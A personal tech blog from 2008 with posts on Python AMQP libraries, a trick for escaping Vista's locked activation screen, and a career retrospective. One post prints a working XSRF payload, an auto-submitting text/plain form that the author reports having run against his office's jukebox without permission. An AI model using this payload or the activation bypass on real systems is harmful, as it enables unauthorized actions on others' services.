2008-11-21

AMQP? Maybe not yet. At least not with Python.


In my last Python project I thought about using AMQP messaging. A quick look at the Python AMQP libraries shows two possibilities: the Apache Qpid Python client and py-amqplib.
Both libraries are developed in close step with their brokers: the Apache client goes with Qpid, py-amqplib with RabbitMQ.

Apache Qpid

I started my adventure by downloading the source. They don’t have binary packages so this is what’s needed:
$ wget http://www.apache.org/dist/incubator/qpid/M3-incubating/qpid-incubating-M3.tar.gz
$ tar xvzf qpid-incubating-M3.tar.gz
$ cd qpid-incubating-M3/
Hmm. What’s next... No README files... After some googling I found that there’s a getting started guide. Following it, this should be the magic command:
$ cd java/broker
$ PATH=$PATH:bin QPID_HOME=$PWD ./bin/qpid-server -c etc/persistent_config.xml
./bin/qpid-server: line 37: qpid-run: No such file or directory
Okay, let’s look for the missing file somewhere:
$ find ../.. -name qpid-run
../../java/common/bin/qpid-run
$ cp ../../java/common/bin/qpid-run bin
Next try:
$ PATH=$PATH:bin QPID_HOME=$PWD ./bin/qpid-server -c etc/persistent_config.xml
Setting QPID_WORK to /home/majek as default
System Properties set to -Damqj.logging.level=info -DQPID_HOME=/home/majek/b/qpid-incubating-M3/java/broker -DQPID_WORK=/home/majek
Using QPID_CLASSPATH /home/majek/b/qpid-incubating-M3/java/broker/lib/qpid-incubating.jar:/home/majek/b/qpid-incubating-M3/java/broker/lib/bdbstore-launch.jar
Info: QPID_JAVA_GC not set. Defaulting to JAVA_GC -XX:+UseConcMarkSweepGC -XX:+HeapDumpOnOutOfMemoryError
Info: QPID_JAVA_MEM not set. Defaulting to JAVA_MEM -Xmx1024m
Exception in thread "main" java.lang.NoClassDefFoundError: org/apache/qpid/server/Main
Caused by: java.lang.ClassNotFoundException: org.apache.qpid.server.Main
That’s enough. I’m definitely too stupid to run this server and too busy to waste more time here (there is also another reason why I’m not really interested in Qpid, read on).

py-amqplib + RabbitMQ

Here installation went smoothly.
$ easy_install amqplib
The broker:
$ wget http://www.rabbitmq.com/releases/rabbitmq-server/v1.4.0/rabbitmq-server_1.4.0-1_all.deb
$ sudo dpkg -i rabbitmq-server_1.4.0-1_all.deb

The good

I also downloaded the py-amqplib sources and found that the examples work out of the box:
~/amqplib-0.5/demo$ ./demo_send.py  1
~/amqplib-0.5/demo$ ./demo_receive.py
The most common way of using Barry’s library is to write software that only consumes data from AMQP: one event loop blocks forever, and when something happens on AMQP a callback is executed. My use case is slightly different. The project I’m writing uses asynchronous programming, which means I already have one event loop, and it is not the AMQP event loop. I want to run the AMQP stack every time something happens on its socket. This is how it would look in pseudocode:
while True:
    nonblocking_consume_amqp_events()
    <magically_wait_for_activity_on_amqp_socket>
The Qpid Python client has only a blocking interface, so it’s impossible to write code like that. Fortunately there’s a nonblocking client in Barry’s library. There’s even an example:
./nbdemo_receive.py
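
The "magically wait" step from the pseudocode above could be filled in with select. What follows is only a minimal Python 3 sketch and not amqplib code: a local socket pair stands in for the AMQP connection, and drain_nonblocking and run_once are hypothetical helper names invented for this illustration.

```python
import select
import socket


def drain_nonblocking(sock, handle, bufsize=4096):
    """Read everything currently available on a non-blocking socket.

    Returns False if the peer closed the connection, True otherwise.
    """
    while True:
        try:
            data = sock.recv(bufsize)
        except BlockingIOError:
            return True       # nothing more to read right now
        if not data:
            return False      # peer closed the connection
        handle(data)


def run_once(sock, handle, timeout=1.0):
    """One iteration of an external event loop that watches one socket."""
    readable, _, _ = select.select([sock], [], [], timeout)
    if sock in readable:
        return drain_nonblocking(sock, handle)
    return True


# Demo: a socket pair plays the role of the broker connection (assumption).
left, right = socket.socketpair()
right.setblocking(False)
received = []
left.sendall(b"hello")
run_once(right, received.append)
left.close()
right.close()
```

In a real program the select call would watch every socket the application cares about, and the AMQP client would be driven only when its own socket shows up as readable.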

The bad

The demo doesn’t work correctly when there are more messages in the queue, and it fails, not very nicely, with this traceback:
Traceback (most recent call last):
[...]
File "build/bdist.linux-i686/egg/amqplib/nbclient_0_8.py", line 74, in write
P' read_buf='&!amq.ctag-FC3ET7kTcqy/A93gJYQWqw==6!amq.ctag-FC3ET7kTcqy/A93gJYQWqw==myfan2

The bug above is triggered by basic_ack, so I removed that call and stopped sending message acknowledgements. Now the order of delivered messages got broken:
['1', '1']
['2', '1', '2']
['3', '1', '2', '3']
['4', '1', '2', '3', '4']
If the problem is with acknowledgements, one could say: use no_ack on the channel and just disable them. Sorry, this doesn’t work either.
I send ten messages:
['a_0', 'a_1', 'a_2', 'a_3', 'a_4', 'a_5', 'a_6', 'a_7', 'a_8', 'a_9']
Then another ten:
['b_0', 'b_1', 'b_2', 'b_3', 'b_4', 'b_5', 'b_6', 'b_7', 'b_8', 'b_9']
I receive:
['b_0', 'b_1', 'b_2', 'b_3', 'b_4', 'b_5', 'b_6', 'b_7', 'b_8', 'b_9',
'a_0', 'a_1', 'a_2', 'a_3', 'a_4', 'a_5', 'a_6', 'a_7', 'a_8', 'a_9',
'b_0', 'b_1', 'b_2', 'b_3', 'b_4', 'b_5', 'b_6', 'b_7', 'b_8', 'b_9']
While I was working on this issue I got worried that my Python process was eating more and more memory. After some debugging I discovered that amqplib has very nice memory leaks (okay, reference cycles).
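
For anyone wondering why reference cycles look like leaks: objects that point at each other are never freed by reference counting alone, so they linger until the cycle collector gets to them. Here is a minimal Python 3 sketch of that effect. Node and make_cycle are made-up names and have nothing to do with amqplib's internals.

```python
import gc


class Node:
    """Tiny object that can point at another Node."""

    def __init__(self):
        self.other = None


def make_cycle():
    a, b = Node(), Node()
    a.other, b.other = b, a   # a -> b -> a: refcounts never drop to zero


gc.disable()                  # keep the automatic collector out of the way
gc.collect()                  # start from a clean slate
make_cycle()                  # both nodes are unreachable now, yet still alive
found = gc.collect()          # count of unreachable objects the collector found
gc.enable()
print("unreachable objects found:", found)
```

If a long-running process builds such cycles faster than the collector cleans them up, its memory usage grows in exactly the way described above.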

The ugly

After a few days I finally managed to create the nonblocking code that I needed. But it’s really ugly:
# Module path as seen in the traceback above; the nbamqp alias is assumed.
import amqplib.nbclient_0_8 as nbamqp

# Marker exception, raised only to break out of nbloop().
class MException(Exception):
    pass

def my_nb_callback(ch):
    raise MException

conn = nbamqp.NonBlockingConnection('localhost',
                                    userid='guest', password='guest',
                                    nb_callback=my_nb_callback, nb_sleep=0.0)

ch = conn.channel()
ch.access_request('/data', active=True, read=True)

ch.exchange_declare('myfans', 'fanout', auto_delete=True)
qname, _, _ = ch.queue_declare()
ch.queue_bind(qname, 'myfans')

msgs = []
def callback(msg):
    msgs.append(msg)

ch.connection.sock.sock.setblocking(False)
ch.basic_consume(qname, callback=callback)
while True:
    msgs = []
    <magically_wait_for_data_on_ch.connection.sock.sock>
    try:
        nbamqp.nbloop([ch])
    except MException:
        pass
    # Acknowledge everything, but keep only the first copy of each body.
    unique_msgs_filter = {}
    unique_msgs = []
    for msg in msgs:
        msg.channel.basic_ack(msg.delivery_tag)
        if msg.body not in unique_msgs_filter:
            unique_msgs_filter[msg.body] = True
            unique_msgs.append(msg.body)
    print '%r ' % (unique_msgs)
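
The filtering step at the end of that loop can be looked at on its own. Below is a small Python 3 sketch (unique_in_order is a hypothetical helper name) fed with the same sequence as the duplicated delivery shown earlier. It drops the repeated messages, but note that it cannot restore the order in which they were sent.

```python
def unique_in_order(items):
    """Return items with duplicates removed, keeping first occurrences."""
    seen = set()
    result = []
    for item in items:
        if item not in seen:
            seen.add(item)
            result.append(item)
    return result


# Same shape as the delivery above: the b batch, the a batch, the b batch again.
a = ['a_%d' % i for i in range(10)]
b = ['b_%d' % i for i in range(10)]
received = b + a + b

unique = unique_in_order(received)
print(unique)
```

Filtering on the message body only works while bodies are unique, which happens to be true for this test data; it is a workaround, not a fix.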


Back to RabbitMQ

For this simple research Rabbit works perfectly, straight out of the box. For a moment I even forgot that the Python library is not all of the software involved. But when I wanted to see some more details about it, things became messy:
$ rabbitmqctl --help
Password:
Which password would you like? Even if I knew, I’m not going to give any password away just to see the help message, sorry. Next try:
$ rabbitmq-server --help
/usr/sbin/rabbitmq-server: 44: cannot create /var/log/rabbitmq/rabbit.log.bak: Permission denied
/usr/sbin/rabbitmq-server: 45: cannot create /var/log/rabbitmq/rabbit-sasl.log.bak: Permission denied
{error_logger,{{2008,11,21},{0,26,12}},"Protocol: ~p: register/listen error: ~p~n",["inet_tcp",einval]}
{error_logger,{{2008,11,21},{0,26,12}},crash_report,[[{pid,<0.22.0>},{registered_name,net_kernel},{error_info,{error,badarg}},{initial_call,{gen,init_it,[gen_server,<0.19.0>,<0.19.0>,{local,net_kernel},net_kernel,{rabbit,shortnames,15000},[]]}},{ancestors,[net_sup,kernel_sup,<0.9.0>]},{messages,[]},{links,[<0.19.0>]},{dictionary,[{longnames,false}]},{trap_exit,true},{status,running},{heap_size,377},{stack_size,21},{reductions,309}],[]]}

Conclusion
Even if the AMQP protocol is great, the AMQP user stack still needs a lot of polish, in my opinion.

Update #1:
rabbitmq-discuss thread


2008-11-18

How to escape from blocked unactivated Vista

A few times I was pissed off by this screen:
It means that I hadn't activated Vista in time and Microsoft stopped liking me. The problem is that at least twice I was caught by this screen when I had no access to the net. I had the WiFi password, but hadn't entered it yet. When Vista is blocked you don't have access to any networking settings, so the password is useless. Yet another time, because of a bug in Vista, I needed to re-enter my Windows key. Of course the easiest way to get the key is to use KeyFinder rather than waste time searching for it. The key, in the end, would probably be somewhere online anyway, like in MSDNAA.

Fortunately you can easily escape from the blocked Vista. This is how you can do it. After clicking "Activate now" this screen appears:

Just choose "buy a new product key online", which spawns a new browser window. I had Opera set as the default browser, but any browser should work. The trick is to enter "c:\windows\system32\cmd.exe" as the URL.
We want to run this magic program.
Next, the well-known black cmd window should appear. We're back home :) Just enter "explorer" to bring up the usual Windows Start menu and taskbar.
That's it. You now have normal access to your computer. You can then configure wireless networks or do whatever you like.

The only problem is remembering these instructions for when you don't have access to the internet.



2008-11-17

Tracing Python memory leaks

Tracing Python memory leaks.



2008-11-11

Simple inter-process locks

On the LShift blog I wrote about simple inter-process locks in Python.



2008-11-10

Youtube - a team of highly trained monkeys...


In translation "A team of highly trained monkeys has been dispatched to deal with this situation."

I'm not the only one to see this message. I think it's even better than the "you broke reddit" message.



2008-11-04

Jukebox XSRF


At LShift we use Tony’s Erlang jukebox. It's great: anyone can play music at the office. I found an XSRF hole there and exploited it maliciously. Every time someone inside the office opens this blog, Britney gets played.

The exploit is not especially complicated:
<form id='f' method="post" enctype="text/plain"
      action="http://jukebox/rpc/jukebox">
  <input
    name='{"version":"1.1","id":287,"method":"enqueue","params":["x'
    value='x",[{"id":["jukebox@xxxx",[1,1,1]],"url":"http://[...]one%20more%20time.mp3","username":null}],false]}'>
</form>

<script>
  f.submit()
</script>
The hardest part was finding somewhere to hide the equals sign from the key=value syntax that's used when the encoding is text/plain. My code puts the equals sign into the song owner JSON field.
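
To see why the equals sign has to land inside a string, it helps to rebuild the request body by hand. This is a rough Python 3 sketch, assuming the browser serializes a text/plain form field as name=value followed by a line break. The field name and value are copied from the form above, except for the song URL, which is a hypothetical placeholder because the real one is elided.

```python
import json

# Field name and value as in the form; the URL below is a made-up placeholder.
name = '{"version":"1.1","id":287,"method":"enqueue","params":["x'
value = ('x",[{"id":["jukebox@xxxx",[1,1,1]],'
         '"url":"http://example.invalid/song.mp3","username":null}],false]}')

# Assumed text/plain serialization: name, an equals sign, value, CRLF.
body = name + "=" + value + "\r\n"

# The two halves join into a single JSON document; the "=" ends up
# harmlessly inside the first string parameter.
request = json.loads(body)
print(request["method"], request["params"][0])
```

Split anywhere outside a string literal, the same equals sign would have made the body invalid JSON.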

That's it. It's quite hard to avoid such issues. I prefer checking the Referer header on all incoming POST requests, but this method is not perfect either.
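
A Referer check of that kind might look roughly like the Python 3 sketch below. It is not the jukebox's code: referer_allowed is a hypothetical helper, and it assumes the request headers arrive as a plain dict with the key spelled "Referer".

```python
from urllib.parse import urlsplit


def referer_allowed(method, headers, allowed_hosts):
    """Return True if the request passes a simple Referer policy.

    Only POST requests are checked; a POST with a missing or
    foreign Referer is rejected.
    """
    if method.upper() != "POST":
        return True
    referer = headers.get("Referer", "")
    host = urlsplit(referer).hostname   # None when the header is empty
    return host is not None and host in allowed_hosts


allowed = {"jukebox"}
print(referer_allowed("POST", {"Referer": "http://jukebox/index.html"}, allowed))
print(referer_allowed("POST", {"Referer": "http://evil.example/post"}, allowed))
```

The imperfection is visible in the code: clients or proxies that strip the header get rejected along with the attackers, and the check protects nothing if the header can be forged.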

So beware of XSRF!


Update #1:
I removed this malicious feature from this blog. I don't want to lose potential readers from inside the LShift office. I'm also not a fan of Britney...


2008-11-02

Blog success story

The beginnings

I wrote the first post on this blog 22 months* ago. My intentions weren’t clear. I wanted to document my ideas (I had a lot of them), have a place to store code snippets and maybe promote myself.

I wrote my first posts in Polish and didn’t really know if I would be able to write in English. When I look at those first posts, I start to understand that they were just testing the territory. I didn’t know what to write about, how far I could go, who would be reading it, whether the crawlers would catch it and how many private things I could publish.

For example, in one of my stupidest posts I wrote that "the term of the week is inwalidacja".


The job

There are two important factors when you’re choosing an employer:
  • who is the smartest in the room (you shouldn’t take the job if it’s you)
  • how far it is to the kettle (the closer, the better)
I applied to a few companies, including Opera and Google. What I can say is that I liked the recruiters at Opera very much and I have a bad opinion of the Google ones. On the other hand, Google’s technical staff is very good and I have mixed feelings about Opera’s. I used an old trick and asked a technical question through the technical director of Opera, but got no answer from the staff. Either the trick stopped working or the communication inside their company really sucks. I also don’t have good feelings about applying to Google. It’s like gambling: if you lose once, please, try again. The recruiters don’t know anything apart from the marketing bullshit. Applying for a job there is really random. You don’t know where you will be working, what exactly you will do, with whom you will be working, how much you can get for your work, and how far you are going to be from the kettle (are you feeling lucky enough to apply there?). I’m rather immune to marketing talk and I really have no idea what it’s like inside Google (i.e. where the kettles are). One more thing: I have heard of people relocating within Microsoft, but never heard a story about relocating within Google (except for the management).

All of my Google pens are broken, Opera pen is still in perfect condition.

I should also say a word about Flumotion, a very nice company from Barcelona. They are very open-source friendly and they have extremely interesting technology. They are becoming a bit too corporate in my opinion. On the other hand, I really love their clear and stable business model.


The results

I learned a lot of things while writing this blog. First, I improved my writing skills, though I still have a lot to learn. Blogging gave me huge motivation to finish projects, to sort my ideas, to document my interests.

Some posts were written specifically to gain attention. Other posts talked about my broken software and gained popularity unintentionally.

The blog really helped me to document my things. For example I’m still interested in a crazy idea of implementing mutexes based on strace.


I spent really a lot of time writing posts here, but it was not wasted time. I always thought of it as an investment, without really knowing what I was investing in.

I’m especially proud of the keywords that bring people to my blog. I never wanted to specialize in a specific sector of IT, but I never thought I would get such a wide audience. Here are some of the popular keywords that led to my blog: popcnt (of course), python libevent, google app engine ssl (hey, Google, people do need ssl for GAE!), bidirectional search, msg_oob, gcc extensions, python process name, _mm_stream_si32, django comet, libevent example, linkedin graph, pcap example, nmap nse, python pthread, 8gb ram 64 bit, epoll, inwalidacja and (my favorite) concurrent programming.



Lshift office
The job #2

Recently I got a good job at LShift. It’s hard to say how important the blog was in getting this job, but it surely had an impact.

I’m still rather young, so it’s hard for me to make a meaningful comparison of how good LShift is, but from what I’ve seen it seems really promising. In the end, LShift is also an assembler operation, just like Popcnt. And I have a desk not so far from the kettle.



Cisco NSLU2, Slugs, used for testing the RabbitMQ at LShift
The future

I don’t know if I’m still going to have a lot of things to write about. Probably some of my blogging will go to Lshift’s blog. But it’s too soon to say how much.


The conclusion

If you ever thought about writing a blog, just do it. Register some stupid name at blogspot and think of a better domain later. Start with anything: thoughts, ideas, stuff you’re working on (you’ll have a unique opportunity to piss off your boss).

I have no idea if I really achieved success; time will tell. I got a job and relocated, that’s it, nothing special. But this is what I wanted to achieve.




*
Code snippet, 22 months:
>>> import datetime, dateutil.relativedelta
>>> datetime.date.today() - dateutil.relativedelta.relativedelta(months=22)
datetime.date(2007, 1, 2)